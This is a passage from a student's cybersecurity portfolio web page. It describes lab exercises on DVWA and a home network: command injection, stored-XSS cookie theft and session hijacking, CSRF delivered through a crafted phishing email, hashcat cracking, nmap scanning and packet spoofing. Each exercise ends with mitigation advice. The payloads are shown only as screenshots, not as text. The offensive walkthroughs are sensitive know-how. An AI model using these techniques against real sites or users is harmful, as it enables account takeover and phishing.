          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
           <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
           it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
